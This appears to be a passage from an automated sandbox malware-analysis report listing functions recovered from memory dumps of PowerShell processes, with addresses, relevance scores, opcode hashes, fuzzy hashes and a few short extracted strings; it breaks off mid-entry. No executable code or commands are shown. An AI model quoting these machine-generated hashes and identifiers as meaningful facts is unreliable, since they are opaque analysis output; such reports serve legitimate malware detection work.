                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0bceb7fddc08880cb708982084e2c15abb4e2318c4b7bbbca5ed7fd8b60b9a76
                                                                        • Instruction ID: a42f35dcd0ba4c17489dd0419feaf3170ec9126fb6a0b4b405100b8955a2fbc4
                                                                        • Opcode Fuzzy Hash: 0bceb7fddc08880cb708982084e2c15abb4e2318c4b7bbbca5ed7fd8b60b9a76
                                                                        • Instruction Fuzzy Hash: E5F10432E0EA854FE759EB2858562797BE2EF55A50F1801FEC04DC71D3DF28AC868346
                                                                        Function 00007FF848B4ACEF Relevance: .5, Instructions: 461COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ba8f9bc8c1d5cc03cab1f72477de2ba8214e746d78b640d880ff77f292d46e7e
                                                                        • Instruction ID: 29b120c3a094f5cf6858f1c3d15166a8c75cee0df5e76176c3f95afd0d6a74a4
                                                                        • Opcode Fuzzy Hash: ba8f9bc8c1d5cc03cab1f72477de2ba8214e746d78b640d880ff77f292d46e7e
                                                                        • Instruction Fuzzy Hash: 8CE14532E0EB854FE799EB285852279BBE1EF55A50F1800FEC05CC71D3DE28AC458346
                                                                        Function 00007FF848A7D7BB Relevance: .4, Instructions: 432COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2382447871.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 603f5d3a32b9cd6106dcb749f4446166e8ca4984b9feb2cf2ed442cca18124bc
                                                                        • Instruction ID: 97e48afa762f7ae12a941650cdeb3aa079e1f5b004e64e2d40740209f4f94b3e
                                                                        • Opcode Fuzzy Hash: 603f5d3a32b9cd6106dcb749f4446166e8ca4984b9feb2cf2ed442cca18124bc
                                                                        • Instruction Fuzzy Hash: A4E12930A18A4D8FDF88EF58D495AAD77E1FFA8350F14416AE40DD7299CB74E881CB81
                                                                        Function 00007FF848B49F84 Relevance: .4, Instructions: 414COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 918afb83eb273dac4cef9d024eaeb831a0adde2067582051ee108c8897eb8bfa
                                                                        • Instruction ID: 7cff0a4465a4727e300099e97cace90f9d651069948b6463feac62dc824601b7
                                                                        • Opcode Fuzzy Hash: 918afb83eb273dac4cef9d024eaeb831a0adde2067582051ee108c8897eb8bfa
                                                                        • Instruction Fuzzy Hash: 40B17831A0EBC94FE796AB3858561B57FE1EF12650F0800FBC049CB1D3DA09AC46C356
                                                                        Function 00007FF848A75560 Relevance: .4, Instructions: 384COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2382447871.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 34c130523134183ea0be168caf07c51712a07c2006c5d3ea99869ae854e68437
                                                                        • Instruction ID: 711aef8c4ec5832263b556c35da5f248db6ef4ab23b98f37c79aedef7bed5b28
                                                                        • Opcode Fuzzy Hash: 34c130523134183ea0be168caf07c51712a07c2006c5d3ea99869ae854e68437
                                                                        • Instruction Fuzzy Hash: F6C16D30A18A4D8FDF98EF68C485AAD7BF1FF68340F14416AD409D7296CB74E881CB81
                                                                        Function 00007FF848B446C9 Relevance: .4, Instructions: 358COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b404a41364737ffdb738179c5167c9abb40d70d5040ea2c01b8e34b61631b783
                                                                        • Instruction ID: 86ea536743826d5648ba3588cd85d0f09421ebca9a202ad3ede987335c4d35de
                                                                        • Opcode Fuzzy Hash: b404a41364737ffdb738179c5167c9abb40d70d5040ea2c01b8e34b61631b783
                                                                        • Instruction Fuzzy Hash: 68A13731E0FA864FE799AA2858571753BD1EF52BA4F4801BED00DC35D3EF18AC128346
                                                                        Function 00007FF848A7BB0B Relevance: .3, Instructions: 307COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2382447871.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5788daee24148f0a10896322d1986249701e0b8aa4a00e25384ac2004f6d9ffa
                                                                        • Instruction ID: b4c7859afed7ff6a8a5088154b0fa051a82cbbebaff79115811b4f438ded1747
                                                                        • Opcode Fuzzy Hash: 5788daee24148f0a10896322d1986249701e0b8aa4a00e25384ac2004f6d9ffa
                                                                        • Instruction Fuzzy Hash: E4A1827060DA4D8FEBA8EF28D8567F937D1FB58351F00822AE84DC7291CF7499458B86
                                                                        Function 00007FF848B4A9CA Relevance: .2, Instructions: 212COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9c32a74dd82b24507c1ad89fee349ed1984f66e10749c74cec33a7d24d7bacb1
                                                                        • Instruction ID: d1e5fce9ce4d0985ceb4cacb080be1e182a4e4e9a59ffe734c18eae1f7a7dc7c
                                                                        • Opcode Fuzzy Hash: 9c32a74dd82b24507c1ad89fee349ed1984f66e10749c74cec33a7d24d7bacb1
                                                                        • Instruction Fuzzy Hash: 19610421A0EBC94FE756EB2858651A57FE0EF56650F0900FBC088CB4E3DB589C89C366
                                                                        Function 00007FF848B4A200 Relevance: .1, Instructions: 126COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 029f0c3df629c764bea2fac5e7a8604f2ca167fb8d87315cd306c7b638872958
                                                                        • Instruction ID: 6691f9fa9349a72b979d397fc053c961ef8b3a3779f08bfe8fe2e169091e458a
                                                                        • Opcode Fuzzy Hash: 029f0c3df629c764bea2fac5e7a8604f2ca167fb8d87315cd306c7b638872958
                                                                        • Instruction Fuzzy Hash: 75410331A0EBC94FE756AB3858915A83FE0EF16650F0900FBC488CB5D3DB19AC49C316
                                                                        Function 00007FF848B45792 Relevance: .1, Instructions: 108COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a0701e54cc00216033042e9493dc414822dc72e0609a670b8b96586f982c0c22
                                                                        • Instruction ID: 85320ba453b159df5b3642a8f589c0ff8e34b0e9b9216d79ada1020a62721d21
                                                                        • Opcode Fuzzy Hash: a0701e54cc00216033042e9493dc414822dc72e0609a670b8b96586f982c0c22
                                                                        • Instruction Fuzzy Hash: 5C31E622D1FE879FF699A62828121786BD0EF15BE0F5941BAD42DD35D3DF0C9C00435A
                                                                        Function 00007FF848B44854 Relevance: .1, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 885362d6bfac381677a574b61c454bf0415ae875538c80f67ada40efc0432c42
                                                                        • Instruction ID: 37f83daa87e1cfcab20841743e3a382794e7601017744a6e3d1196d4e28a7c36
                                                                        • Opcode Fuzzy Hash: 885362d6bfac381677a574b61c454bf0415ae875538c80f67ada40efc0432c42
                                                                        • Instruction Fuzzy Hash: E7212622E1FA8A5FF399BA3C145217463D2EF81AA4F8801BAD01DC35D3EE1CEC11520A
                                                                        Function 00007FF848A7B5C4 Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2382447871.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ad327724b59b89c10fe6e8198c5c73b7f22e722d4169093af7414a1a842a16a7
                                                                        • Instruction ID: ec08cff0f97e7f3991ad9792492475bee9d38ac68f094ae246a6eaca14bb57ce
                                                                        • Opcode Fuzzy Hash: ad327724b59b89c10fe6e8198c5c73b7f22e722d4169093af7414a1a842a16a7
                                                                        • Instruction Fuzzy Hash: F5312B7091E64E8EFBB4EF15CC0ABF93294FF42355F400139D50D86092CB78A98ADB26
                                                                        Function 00007FF848B4189F Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8ed955a7c9db00bd26e6a34c2c91923e51ba661735b07cc91006e0a8fcd90027
                                                                        • Instruction ID: f4fb101b039f07eec03a6a0ce45912f52fca9f1ea2fcc6d042466fcf9a9a0dc1
                                                                        • Opcode Fuzzy Hash: 8ed955a7c9db00bd26e6a34c2c91923e51ba661735b07cc91006e0a8fcd90027
                                                                        • Instruction Fuzzy Hash: 4C21F322E0EAD65FE359E63C28561756FE1EF5AE90F0805FED049CB2D7DE084C468326
                                                                        Function 00007FF848B49B76 Relevance: .1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 992839f3ef97f0a2916221bd9070de383fcb660e959964097bb9f77eedcb2b5b
                                                                        • Instruction ID: d15350b0f735a91f27bf4ee0828479f6914f6ddfd2bc6fd0236158c5f6f9d252
                                                                        • Opcode Fuzzy Hash: 992839f3ef97f0a2916221bd9070de383fcb660e959964097bb9f77eedcb2b5b
                                                                        • Instruction Fuzzy Hash: 0C11A222E0EA855FE719EB2858562FCB7A1FF45760F1801BED08D871D3DF282C498745
                                                                        Function 00007FF848B4971D Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 84dafe67c6f7143c0eb52d83c97098ec92f884574f3eac1206d0698c2f61dc46
                                                                        • Instruction ID: f7f04142aa1cfb27635c88084136ace9ef1de3aa42bc1ab7e551b186dc5202af
                                                                        • Opcode Fuzzy Hash: 84dafe67c6f7143c0eb52d83c97098ec92f884574f3eac1206d0698c2f61dc46
                                                                        • Instruction Fuzzy Hash: AF113A21A0EAC51FD7A7EB385851465BFE0EF16760B1801FAC048CB1D3DA189C05C385
                                                                        Function 00007FF848A73945 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2382447871.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                        • Instruction ID: 3fff26735646f92442a3ec2b0c44caab59de539b4e447e85c8e34eaf18a3fd35
                                                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                        • Instruction Fuzzy Hash: 4201843010CB084FDB44EF0CE051AA5B7E0FB85364F10052DE58AC3691D622E881CB46
                                                                        Function 00007FF848B4794A Relevance: .0, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd8e429a855e0e9473a4e87919a79b37692e5c361217f40ca2418c1b9378cb66
                                                                        • Instruction ID: 6072ea34ce1d1a5ee7919302059ae3785c0cee6bf09905f75cfd8315726ea5f0
                                                                        • Opcode Fuzzy Hash: bd8e429a855e0e9473a4e87919a79b37692e5c361217f40ca2418c1b9378cb66
                                                                        • Instruction Fuzzy Hash: BDF0E533A0C90D5EE385E63C68061F973D2EFC9132F554277C55EC3242EE15980A4244
                                                                        Function 00007FF848B49509 Relevance: .0, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e4b499b58460e820a68912a112705c29745611bb00b7f7cbea5f0887e408425d
                                                                        • Instruction ID: 6c1b78fc423ed5ad839a1a4995bd83af79fd42027277bbea4b802668454e071c
                                                                        • Opcode Fuzzy Hash: e4b499b58460e820a68912a112705c29745611bb00b7f7cbea5f0887e408425d
                                                                        • Instruction Fuzzy Hash: 41E0DF32F1DB0A0EFB89A52C38130FDB3E1EF81560B64183FC20EC2443E92AA8124249

                                                                        Executed Functions

                                                                        Function 0490EDF0 Relevance: .3, Instructions: 281COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cc584323dadcb1fa496305e870d3116b3da94d5e77324a9333de590fdb77ec2e
                                                                        • Instruction ID: d7a9447291af3434be6cec3d1caa3c8c51984f5441742a28d37f6bf0e67c1b06
                                                                        • Opcode Fuzzy Hash: cc584323dadcb1fa496305e870d3116b3da94d5e77324a9333de590fdb77ec2e
                                                                        • Instruction Fuzzy Hash: 99B13E70E00209DFDF20CFA9D98579EBBF6AF88314F14C539E415A7294EB74A946CB81
                                                                        Function 0490F6C0 Relevance: .3, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dc3132591bcc61abcb3e6a5558d8f5e13b212589387e93c213e8eed69309522d
                                                                        • Instruction ID: d7c227faf7da1d073195627344b5f95f602719fdc885febc5116086d3cf10684
                                                                        • Opcode Fuzzy Hash: dc3132591bcc61abcb3e6a5558d8f5e13b212589387e93c213e8eed69309522d
                                                                        • Instruction Fuzzy Hash: 0FB16071E00209DFDB20CFA9D98179DBBF6AF88314F14C539D815E7298EBB4A945CB81
                                                                        Function 049096D9 Relevance: .1, Instructions: 118COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7eb09feb0e8036bf8d1132a367dc5993dcf869fc7e82fcc324ecf1a04deda867
                                                                        • Instruction ID: 1b9a991d737ba0d34ad9ccc898c5001848f89a100606ef87dd3931e314f9cc82
                                                                        • Opcode Fuzzy Hash: 7eb09feb0e8036bf8d1132a367dc5993dcf869fc7e82fcc324ecf1a04deda867
                                                                        • Instruction Fuzzy Hash: 70418171A002008FDB18DF68C958AAD7BF6EF8A754F15846DE806EB7A1DB34AC45CB50
                                                                        Function 077F2C28 Relevance: 15.5, Strings: 12, Instructions: 451COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                        • API String ID: 0-78369665
                                                                        • Opcode ID: bff2b0610c7fe1fd6d80d906fa433e743ebdd4c189231e574de7ecd6d4f9ff6c
                                                                        • Instruction ID: 4dfabde702185280887b77312934e5f78db33de8a6dea17e52ca214b584ceea9
                                                                        • Opcode Fuzzy Hash: bff2b0610c7fe1fd6d80d906fa433e743ebdd4c189231e574de7ecd6d4f9ff6c
                                                                        • Instruction Fuzzy Hash: A9E149B1704206DFCB258F38CA5066ABBF2BF85250F2488ABDA55CB352DB35C845C762
                                                                        Function 077F6E78 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                                                        • API String ID: 0-471056614
                                                                        • Opcode ID: fbb75935189d22ff72500a37ae90d161567a20bebfbe26a675751235a3ef3276
                                                                        • Instruction ID: 846eb89874f86ffbb3a78bb30877d7499c06220b212b9565c03e44dcf8326ba0
                                                                        • Opcode Fuzzy Hash: fbb75935189d22ff72500a37ae90d161567a20bebfbe26a675751235a3ef3276
                                                                        • Instruction Fuzzy Hash: 5DD1AEB0A102059FCB18CB68C651B9EBBB6EF85344F24C864EA116F395CB75EC46CBD1
                                                                        Function 077F764D Relevance: 7.8, Strings: 6, Instructions: 312COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                                                        • API String ID: 0-471056614
                                                                        • Opcode ID: 6f60f2340d4ff10ad8fef5bf4e4c36a62eb076d2f28af99ebfe9fabcfca2237e
                                                                        • Instruction ID: 811d964036c9e25349f6f07760bfe14744867a93d8603f5b774cc1e4302c2427
                                                                        • Opcode Fuzzy Hash: 6f60f2340d4ff10ad8fef5bf4e4c36a62eb076d2f28af99ebfe9fabcfca2237e
                                                                        • Instruction Fuzzy Hash: 8ED1B2B4A002159FDB28DF68CA51B9ABBB2EF84344F108495D5096F395CB35DD82CFA1
                                                                        Function 077FA5C8 Relevance: 5.6, Strings: 4, Instructions: 573COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q$4']q
                                                                        • API String ID: 0-1785108022
                                                                        • Opcode ID: fc0adffeb50ff174cbd2565d44b46d804b67deaf8372dbaa3368c4235adf7714
                                                                        • Instruction ID: 183d3fd642434423f50b5d2f3b3a780eaa6cc7fdc3e827e5ed8038b5b4cfe775
                                                                        • Opcode Fuzzy Hash: fc0adffeb50ff174cbd2565d44b46d804b67deaf8372dbaa3368c4235adf7714
                                                                        • Instruction Fuzzy Hash: 9D1259B1B04306CFCB258B788A5176A7BB29FC3350F15C8BAD649CB351DA35D846C7A2
                                                                        Function 0490B700 Relevance: 4.2, Strings: 3, Instructions: 456COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2623857671.0000000004900000.00000040.00000800.00020000.00000000.sdmp, Offset: 04900000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_4900000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Haq$$]q$$]q
                                                                        • API String ID: 0-1533201563
                                                                        • Opcode ID: 113262eba0a5160c0f8087de31379add95f558eccb167873832b9b07cc68489c
                                                                        • Instruction ID: 348a6c5692322ac6e2d9242e0140a32614a83aebc34c67299804181ac79499ed
                                                                        • Opcode Fuzzy Hash: 113262eba0a5160c0f8087de31379add95f558eccb167873832b9b07cc68489c
                                                                        • Instruction Fuzzy Hash: CE125234B002188FCB19DF64C8546AEB7B6BF89305F1485E9D509AB3A1DF35AD85CF81
                                                                        Function 077F8DB8 Relevance: 4.0, Strings: 3, Instructions: 295COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q
                                                                        • API String ID: 0-1444653880
                                                                        • Opcode ID: 949652fccd7356a7ec645aeeac0564dc6e38efa8eda9873444449eb57e8c62cb
                                                                        • Instruction ID: a20659e121880983b087245c75458a8abece4ebafb80b73df86b129ba01d1fd2
                                                                        • Opcode Fuzzy Hash: 949652fccd7356a7ec645aeeac0564dc6e38efa8eda9873444449eb57e8c62cb
                                                                        • Instruction Fuzzy Hash: 6FA17EB0708346DFCB159B38CA5076A7FE69F82240F1488AAD745CF392DB36D945C7A2
                                                                        Function 077F6E6D Relevance: 4.0, Strings: 3, Instructions: 260COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$4']q
                                                                        • API String ID: 0-705557208
                                                                        • Opcode ID: e67e19405b89535c329e8368b82ffa334d6ddedfd5d1aab359fd167064cc8802
                                                                        • Instruction ID: cf8de6da200f413badf1843fe1d63db9b9356892d5582a29c6a9456a38babd81
                                                                        • Opcode Fuzzy Hash: e67e19405b89535c329e8368b82ffa334d6ddedfd5d1aab359fd167064cc8802
                                                                        • Instruction Fuzzy Hash: 30A18BB4A102059FCB18CF58C640B9EBBB6EF89344F14C869EA116F355CB75EC86CB91
                                                                        Function 077F5020 Relevance: 3.5, Strings: 2, Instructions: 971COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q
                                                                        • API String ID: 0-3120983240
                                                                        • Opcode ID: a62369d34d9e8ff0a569e5a4253a6f6654aa978a45e60d1e620c8a88355b3569
                                                                        • Instruction ID: 3736933f84265b8fb2ddbd849da21521217cd33db65eaa29025bee0f7eb13470
                                                                        • Opcode Fuzzy Hash: a62369d34d9e8ff0a569e5a4253a6f6654aa978a45e60d1e620c8a88355b3569
                                                                        • Instruction Fuzzy Hash: 1C926CB4B00215DFD724CB18CA54BA9BBB2BF85304F14C4A9D909AB355DB72DD82CF91
                                                                        Function 077F7AD3 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2660900942.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q
                                                                        • API String ID: 0-3120983240
                                                                        • Opcode ID: ae740d353c54f98c7f0c997e0fb8dc43e784edc52cdd70ae82ca2fdea8d7f91f
                                                                        • Instruction ID: 65ad900672df48f7884ae7dbe3619adee7e5da092eeb24a2cf3e4c02547a2cc6
                                                                        • Opcode Fuzzy Hash: ae740d353c54f98c7f0c997e0fb8dc43e784edc52cdd70ae82ca2fdea8d7f91f
                                                                        • Instruction Fuzzy Hash: 84F1E4B0B002159FDB24DF68CA50BAEBBB6EF84340F108495D9096F395DB75DD82CB91
                                                                        Function 077F8623 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
